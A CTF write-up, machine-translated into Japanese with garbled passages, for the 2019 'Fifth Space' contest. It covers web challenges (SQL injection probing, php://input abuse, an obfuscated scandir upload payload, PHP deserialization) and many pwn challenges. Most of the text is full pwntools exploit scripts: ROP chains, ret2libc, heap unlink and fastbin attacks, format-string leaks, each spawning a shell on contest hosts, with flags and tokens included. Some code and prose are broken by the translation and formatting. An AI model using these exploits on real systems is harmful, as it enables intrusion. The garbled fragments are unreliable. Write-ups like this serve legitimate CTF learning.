第5空間writeup-str 4 nge

94159 ワード

web
くうそう
アクセス後:第五空间writeup-str4nge_第1张图片試行:id=1第五空间writeup-str4nge_第2张图片再試行:id=1 and 1=1第五空间writeup-str4nge_第3张图片上記のphpファイルの読み取りを試みる:25 d 99 be 830 ad 95 b 02 f 6 f 82235 c 8 edcf 7.php第五空间writeup-str4nge_第4张图片token発見:
http://111.33.164.4:10001/25d99be830ad95b02f6f82235c8edcf7.php?token=1DJBAAA03PNLD02GJ2S1M5LVUL8PTTHA

flag{e32277c14a70aeda80a0d0877241594f}

くうせい
http://111.33.164.6:10003
vimのソースコード漏洩111.33.164.6:10003/.151912db 206 ee 052.php.swp
php


error_reporting(0);
class First{
  function firstlevel(){
        $a='whoami';
        extract($_GET);
        $fname = $_GET['fname']?$_GET['fname']:'./js/ctf.js';
        $content=trim(file_get_contents($fname));
        if($a==$content)
        {
                echo 'ok';;
        else
        {
                echo '    Linux   6?';
        } 
  }
}

$execfirst = new First();
$execfirst -> firstlevel();
?>php

上のphpコードから簡単な変数の使用がわかりますphp://inputプロトコルの1つの知識点で、次のパケットが転送されます.
GET //151912db206ee052.php?a=whoami&fname=php://input HTTP/1.1
Host: 111.33.164.6:10003
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 8
 
whoami

本題の第2関門の通関住所を得る
html
HTTP/1.1 200 OK
Date: Wed, 28 Aug 2019 05:24:42 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.14
Vary: Accept-Encoding
Content-Length: 441
Connection: close
Content-Type: text/html 




hello





欢迎打开新世界的大门!

2 の のアドレスを した 、ファイルのアップロードであることがわかりました.テストの 、phpinfo()、system()など、phpの がフィルタリングされていることがわかりました. なときはphpファイルをアップロードできませんが、htmlファイルをアップロードできることがわかりました.
そしてこのリンクが いことに づきました
url

http://111.33.164.6:10003//2d019a311aaa30427.php?refer=df53ca268240ca76670c8566ee54568a&t=20190828&dtype=computer&file=3792689baaabc7eb&hash256=a7e5034c3039d902b26a3971f29efba8

ファイルパラメータがあり、テスト 、http://111.33.164.6:10003/3792689baaabc7ebそれ がアップロードページなので、fileパラメータにファイルが まれていると します.
http://111.33.164.6:10003//2d019a311aaa30427.php?refer=df53ca268240ca76670c8566ee54568a&t=20190828&dtype=computer&file=3792689baaabc7eb&hash256=a7e5034c3039d902b26a3971f29efba8

は が ったhtmlファイルで、 に ています. で できるのは、 が できるものではない.
 echo 3; $a="sc"."an"."di"."r";$b=$a("./");print_r($b)
http://111.33.164.6:10003//2d019a311aaa30427.php?refer=df53ca268240ca76670c8566ee54568a&t=20190828&dtype=computer&file=upload/eb00b19a1f5fa8&hash256=a7e5034c3039d902b26a3971f29efba8

geiflagのリンクが得られます
六塵
転送ゲート:http://111.33.164.4:10005 tips:./tmp
いずれにしても、flagを手に入れたのは前のいくつかの問題と結びつけて、アクセス/flagishere/直接列ディレクトリの早期スキャンを発見して、また/log/access.logもflagにアクセスする経路を見つけることができて、正しい解法については、他の師匠のwriteupを見る準備ができています
http://111.33.164.4:10005/flagishere/6be8b547d6db1d213c1ceecc30b3cb24.php?token=1DJBG96OVSP05N2GJ2S1M5LVCS46DTR2

八苦
http://111.33.164.6:10004 tips:flag在/var/www/flag.php
この問題は簡単に記録できなかった.
php

careful===1){
                phpinfo();    // step 1:    read source,get phpinfo and read it carefullt
            }
        }
        public function __get($name){
            return $this->securuty[$name];
        }
        public function __call($param1,$param2){
            if($this->{$param1}){
                eval('$a='.$_GET['dangerous'].';');
            }
        }
    }
    class User{
        public $user;
        public function __wakeup(){
            $this->user=new Welcome();
            $this->user->say_hello();
        }
    }
 
    $a=serialize(new User);
    $string=$_GET['foo']??$a;
    unserialize($string);
?>

phpinfo()を表示します.
http://111.33.164.6:10004/index.php?foo=O:4:%22Test%22:1:{s:10:%22%00*%00careful%22;i:1;}

その後はいつも500で、自分も料理が上手で、作っていません.
pwn
pwn6
比較的明らかなオーバーフロー直接漏れ+ret 2 system
pytohn
from pwn import *
context.arch='amd64'
got=0x804a00c
read=0000000000400600
bss=0x00620800
plt0=0x0000000004005c0
strtab=0x4003e8
dynsym=0x4002c8
dynrel=0x000000000400490
p2=flat(
[got,0x07+(((bss+0x10-dynsym)/0x10)<<8)],0xdeadbeef,0xdeadbeef,# DYN_REL & ALAIGN
[bss+0x28-strtab,0x12,0,0,0,0],#DYNSYM
)+"system\x00\x00"+"/bin/sh\x00"#DYNSTR
#p=remote("111.33.164.6",50006)
rdi=0x0000000000414fc3
rsi=0x0000000000414fc1
leave=0x00000000004007c1
 

puts=0x0000000004005D0
got=0x000000000620018
read=0x000000000400600
main=0x0000000004007C3
 

context.log_level='debug'
context.arch='amd64'
#p=process('./pwn8')
p=remote("111.33.164.4",50006)
 

#gdb.attach(p,'''
#b *0x00000000040090E
#''')
#print leak(got)
 

#print leak(got+8)
#log.warning(sys)
p.sendline("1234")
pay="A"*0x10+p64(bss-8)+p64(rdi)+p64(got)+p64(puts)+p64(rdi)+p64(0)+p64(rsi)
pay+=p64(bss)+p64(0)+p64(read)+p64(leave)
p.sendlineafter("?
"
,pay) libc=ELF("libc12.so") base=u64(p.readline()[:-1].ljust(0x8,'\x00'))-libc.sym['puts']#-(0x7ffff7a7c690-0x7ffff7a0d000) log.warning(hex(base)) libc.address=base pay=p64(rdi)+p64(libc.search("/bin/sh").next())+p64(libc.sym['system']) p.send(pay) p.interactive('>')

pwn7
editは直接的なオーバーフローがあって直接unlinkした後に書くことができてfreeのgotを変えることができます.
python
 from pwn import *
def cmd(c):
    p.sendlineafter(">>",str(c))
def sn(c):
    p.sendlineafter(":",str(c))
def add(size)
    cmd(1)

    sn(size)
def show(idx):
    cmd(2)
    sn(idx)
def edit(idx,size,c):
    cmd(3)
    sn(idx)
    sn(size)
    p.sendafter(":",c)
def free(idx):
    cmd(4)
    sn(idx)
context.log_level='debug'
context.arch='amd64'
#p=process('./pwn7')
p=remote("111.33.164.4",50007)
note=0x0000000006020E0
got=0x000000000602018
add(0x88)
add(0x28)
add(0x88)
add(0x1)
free(0)
add(0x88)
show(0)
p.readuntil("data:")
base=u64(p.readline()[:-1].ljust(8,'\x00'))-0x000000003A5678#-(0x7ffff7dd1b78-0x7ffff7a0d000)
base=bass
log.warning(hex(base))
edit(1,0x30,flat([0,0x21,note+8-0x18,note+8-0x10,0x20,0x90])[:-1])
free(2)
edit(1,0x300,'\x00'*0x10+flat([got])+'
'
) libc=ELF("./libc12.so") #libc=ELF("/lib/x86_64-linux-gnu/libc.so.6") edit(3,0x20,'/bin/sh\x00
'
) #gdb.attach(p,'') edit(0,0x8,p64(libc.sym['system']+base)[:-1]) free(3) p.interactive('>')

pwn9
漏れcanaryオーバーフロー静的ropchainは一度行けばいいです
python
from pwn import *
import base64
 

context.log_level = 'debug'
 

elf = ELF('./pwn9')
 

local = 0
if local:
    p = process('./pwn9')
    libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
else:
    p = remote('111.33.164.4', 50009)
    #libc = ELF('')

 
#payload = 'YWFhYWFhYWElMEE='
payload = base64.b64encode('a'*8+'b')
p.recvuntil('>
'
) #gdb.attach(p) p.sendline(payload) p.recvuntil('b') canary = u64(p.recv(7).ljust(8,'\x00')) <<8 success('canary:'+hex(canary)) p1 = 'a'*8 + p64(canary) +'a'*8 p1 += p64(0x0000000000401f57) # pop rsi ; ret p1 += p64(0x00000000006cb080) # @ .data p1 += p64(0x00000000004715e4) # pop rax ; ret p1 += '/bin//sh' p1 += p64(0x000000000047cd21) # mov qword ptr [rsi], rax ; ret p1 += p64(0x0000000000401f57) # pop rsi ; ret p1 += p64(0x00000000006cb088) # @ .data + 8 p1 += p64(0x0000000000426baf) # xor rax, rax ; ret p1 += p64(0x000000000047cd21) # mov qword ptr [rsi], rax ; ret p1 += p64(0x0000000000401e36) # pop rdi ; ret p1 += p64(0x00000000006cb080) # @ .data p1 += p64(0x0000000000401f57) # pop rsi ; ret p1 += p64(0x00000000006cb088) # @ .data + 8 p1 += p64(0x00000000004433e6) # pop rdx ; ret p1 += p64(0x00000000006cb088) # @ .data + 8 p1 += p64(0x0000000000426baf) # xor rax, rax ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046f140) # add rax, 1 ; ret p1 += p64(0x000000000046fea5) # syscall ; ret p.sendline('1') payload = base64.b64encode(p1) p.sendline(payload) success('len:'+str(len(payload))) p.sendline('no') p.interactive()

pwn11
単純オーバーフロー問題漏れ+system
python
from pwn import *
 

context.log_level = 'debug'
 

elf = ELF('./pwn11')
 

local = 0
if local:
    p = process('./pwn11')
    libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
else:#nc 111.33.164.4 50011
    p = remote('111.33.164.4', 50011)
    libc = ELF('./libc12.so')


rdi_ret = 0x4012ab
start = 0x401080
 

p.recvuntil('name
'
) p.sendline('a') p.recvuntil('key?
'
) payload = '1'*0x28 + p64(rdi_ret) + p64(elf.got['stdout']) + p64(elf.plt['puts']) + p64(start) p.send(payload.ljust(0x100)) p.recvuntil('fail!\x0a') read_addr = u64(p.recv(6).ljust(8,'\x00')) libc_base = read_addr - libc.sym['read'] system_addr = libc_base + libc.sym['system'] bin_sh = libc_base + next(libc.search('/bin/sh')) success('read_addr:'+hex(read_addr)) success('libc_base:'+hex(libc_base)) p.recvuntil('name
'
) p.sendline('a') p.recvuntil('key?
'
) payload = '1'*0x28 + p64(rdi_ret) + p64(bin_sh) + p64(system_addr) + p64(start) p.send(payload.ljust(0x100)) p.interactive()

pwn12
この問題は少し泥棒です...2つの穴の1つの逆freeはもう少しで発見していないで比較的にやりやすいです
python
from pwn import *
def it(name="1",info='A'*0x200):
    p.sendafter("?
"
,name) p.sendafter("?
"
,info) def cmd(c): p.sendafter("Exit
"
,str(c).ljust(8,'\x00')) def sn(c): p.sendafter("?
"
,str(c).ljust(8,'\x00')) def add(size): cmd(1) sn(size) def edit(idx,c): cmd(2) sn(idx) p.sendafter(":
"
,c) def show(idx): cmd(3) sn(idx) def free(idx): cmd(4) sn(idx) context.log_level='debug' context.arch='amd64' note=0x0000000006022E0 #p=process('./pwn12') p=remote("111.33.164.4",50012) it(p64(0x0000000006020a0)*2+p64(0)+p64(0x31),p64(0)+p64(0x21)*5) add(0x28)#0 add(0x78)#1 free(0) add(0x28)#0 show(0) base=u64(p.readline()[:-1].ljust(8,'\x00'))-0x0000000003A5678 log.warning(hex(base)) edit(0,"/bin/sh\x00") free(-38) add(0x28)#2 add(0x28)#3 add(0xf8)#4 edit(3,flat(0,0x21,note+0x30-0x18,note+0x30-0x10,0x20)) free(4) #libc=ELF("/lib/x86_64-linux-gnu/libc.so.6") libc=ELF("./libc12.so") edit(3,'\x00'*0x18+p64(libc.sym['__free_hook']+base)) edit(3,p64(libc.sym['system']+base)) #gdb.attach(p,'b *0x000000000400D93') free(0) p.interactive('>')

pwn13
スタックオーバーフローバックドア
python
from pwn import *
def add(s):
    p.sendafter(":",str(1))
    p.sendafter("e
"
,s) sh=0x000555555554A50 context.log_level='debug' context.arch='amd64' #p=process('./pwn13') p=remote("111.33.164.6",50013) add("A"*9) p.readuntil("A"*9) base=u64(('\x00'+p.readline()[:-1]).ljust(8,'\x00'))-0xa00 log.warning(hex(base)) sh=base+0xa50 add("A"*0x28+p64(sh)[:2]) #gdb.attach(p,'b *0x0000555555554A44') p.interactive('>')

pwn14
スタックオーバーフローは比較的簡単で裏口があります
python
from pwn import *
 

context.log_level = 'debug'
 

elf = ELF('./pwn14')

 
local = 0
if local:
    p = process('./pwn14')
    libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
else:
    p = remote('111.33.164.4', 50014)

    
def cmd(num):
    p.recvuntil('choice : ')
    p.sendline(str(num))
 

def add(size,content):
    cmd(1)
    p.recvuntil('note : ')
    p.sendline(str(size))
    p.recvuntil('note:')
    p.send(content)
 

def edit(index, size, content):
    cmd(2)
    p.recvuntil('dex :')
    p.sendline(str(index))
    p.recvuntil('note : ')
    p.sendline(str(size))
    p.recvuntil('note : ')
    p.send(content)
 

def free(index):
    cmd(3)
    p.recvuntil('Index :')
    p.sendline(str(index))
 

 

tar_addr = 0x4040a0
add(0x20,'a'*0x20) #0 
add(0x200,'aaaa
'
) #1 add(0x20,'a'*0x20) free(1) edit(0,0x40,'a'*0x20 + p64(0) + p64(0x211) + p64(0) + p64(tar_addr-0x10)) add(0x200,'a
'
) #gdb.attach(p) cmd(70) #add(0x20,'a'*0x20) p.interactive()

pwn15
裏口があれば簡単に値を変えて裏口を開ければいいです
python
from pwn import *
def cmd(c):
    p.sendlineafter(":",str(c))
def add(size=0x88,c="A"):
    cmd(1)
    cmd(size)
    p.sendafter(":",c)
def edit(idx,size,c="A"):
    cmd(2)
    cmd(idx)
    cmd(size)
    p.sendafter(":",c)
def free(idx):
    cmd(3)
    cmd(idx)
#context.log_level='debug'
context.arch='amd64'
note=0x0000000006020C0
#p=process('./pwn15')
p=remote("111.33.164.6",50015)
add(0x28)
add(0x88)
add(0x18)
edit(0,0x30,p64(0)+p64(0x21)+p64(note-0x18)+p64(note-0x10)+p64(0x20)+p64(0x90))
free(1)
edit(0,0x30,p64(0)*3+p64(0x000000000602088))
edit(0,8,p64(0xeee))
cmd(2019)
p.sendline("/bin/sh ./flag.sh 1DJAR837L8RR7B00000020PHFHVDPV6M")
p.interactive('>')

pwn bf
seedを上書きし、文字列leak onegadgetをフォーマットしてshellを取ります.
 from pwn import*
context.log_level = "debug"
rand = ['7427','39356','9595','54062','67371','42578','92585','76990','22615','53318']
#p = process("./bf")
p = remote("111.33.164.4",50001)
#gdb.attach(p)
a = ELF("./libc12.so")
p.recvuntil("Are you sure want to play the game?")
p.sendline("1")
p.recvuntil("Input your name : ")
p.sendline(("%p%17$lx").ljust(0x1c,"a")+p64(0))

 
def try_it():
    for i in range(0,10):
        p.recvuntil("Now guess:")
        p.sendline(rand[i])
 

try_it()
p.recvuntil("0x")
libc_addr = int("0x"+p.recv(12),16) - a.symbols["_IO_2_1_stdout_"]-131 #_IO_2_1_stdout_+131
canary = int(p.recv(16),16)
print hex(libc_addr)
print canary
#p.sendline("")
one = 0x41320+libc_addr
 

p.sendline("a"*0x34+p64(canary)+"b"*8+p64(one))
 

 

p.interactive()
#flag{81159d272cb171ca74d3d1f325d4ff0a}

pwn mybooks
一言でlibcをまとめると騒がしくて、expを2部書いて、私は仏で、off-by-ullは正常にleakしてそれからfastbin attack
 from pwn import*
context.log_level = "debug"
 

#p = process("./mybooks")
p = remote("111.33.164.4",50002)
libc = ELF("./libc-2.19.so")
#print hex(libc.symbols["puts"])
#gdb.attach(p)
def add(size,name,content):
        p.recvuntil("6. Exit")
        p.sendline("1")
        p.recvuntil("Enter book name (Max 24 chars):")
        p.sendline(name)
        p.recvuntil("Enter desc size: ")
        p.sendline(str(size))
        p.recvuntil("Enter book description: ")
        p.send(str(content))
def remove(idx):
        p.recvuntil("6. Exit")
        p.sendline("2")
        p.recvuntil("Enter the book id you want to delete: ")
        p.sendline(str(idx))
def show(idx):
        p.recvuntil("6. Exit")
        p.sendline("4")
        p.recvuntil("show: ")
        p.sendline(str(idx))
def edit(idx,name,content):
        p.recvuntil("6. Exit")
        p.sendline("3")
        p.recvuntil("Enter the book id you want to edit: ")
        p.sendline(str(idx))
        p.recvuntil("name: ")
        p.send(str(name))
        p.recvuntil("description: ")
        p.send(str(content))
 

 

print libc.symbols["__malloc_hook"]
p.recvuntil("Pls input pass:")
p.sendline("12345678CABB")
 

add(0x80,"a","8")#0
add(0x80,"a","b")#1
remove(0)
#raw_input()
add(0x80,"a","8"*0x8)#0
show(0)
#raw_input()
p.recvuntil("Description: ")
p.recvuntil("8"*8)
libc_addr = u64(p.recv(6).ljust(8,"\x00"))-0x3A5678
print hex(libc_addr)
add(0x80,"a","b")#2
add(0x60,"a","b")#3
add(0xf0,"c","d")#4
remove(2)
edit(4,"a"*0x10+p64(0x20+0x30+0x70+0x90+0x20+0x30),"b
") remove(4) add(0x1a0,"m","m"*0xd0+p64(0)+p64(0x30)) remove(3) malloc_hook = libc.symbols["__malloc_hook"]+libc_addr-0x23 print hex(malloc_hook) one = 0xd6e77+libc_addr edit(2,"m","m"*(0xd0-1)+p64(0)+p64(0x31)+p64(0)*5+p64(0x21)+p64(0)*3+p64(0x71)+p64(malloc_hook)*2+"
") add(0x60,"m","b") add(0x60,"m","\x00"*0x13+p64(one)) p.sendline("1")
 add(0x200,"bbbbbbb","bbbbbb")#3
for i in range(0,10):
        add(0xf8,"1111111","11111111")
 

for i in range(4,4+7):
        remove(i)
remove(11)
edit(13,"a"*0x10+p64(0x100+0x20+0x30+0x100+0x20+0x30),"bbb"+"
") raw_input() remove(13) add(0x300,"b","c") raw_input() for i in range(4,4+7): add(0xf8,"./flag.sh","./flag.sh") remove(12) malloc_hook = libc.symbols["__malloc_hook"]+libc_addr one = libc.symbols["system"]+libc_addr edit(4,"bbb+
","\x00"*0x190+p64(0)+p64(0x101)+p64(malloc_hook)+"
") add(0xf8,"bbb",p64(one))#0x4f2c5 0x10a38c add(0xf8,"bbb",p64(one)) remove(9) ''' p.interactive() #flag{81159d272cb171ca74d3d1f325d4ff0a}

ps:師匠たちtql~~(この試合プラットフォームは大変だ...)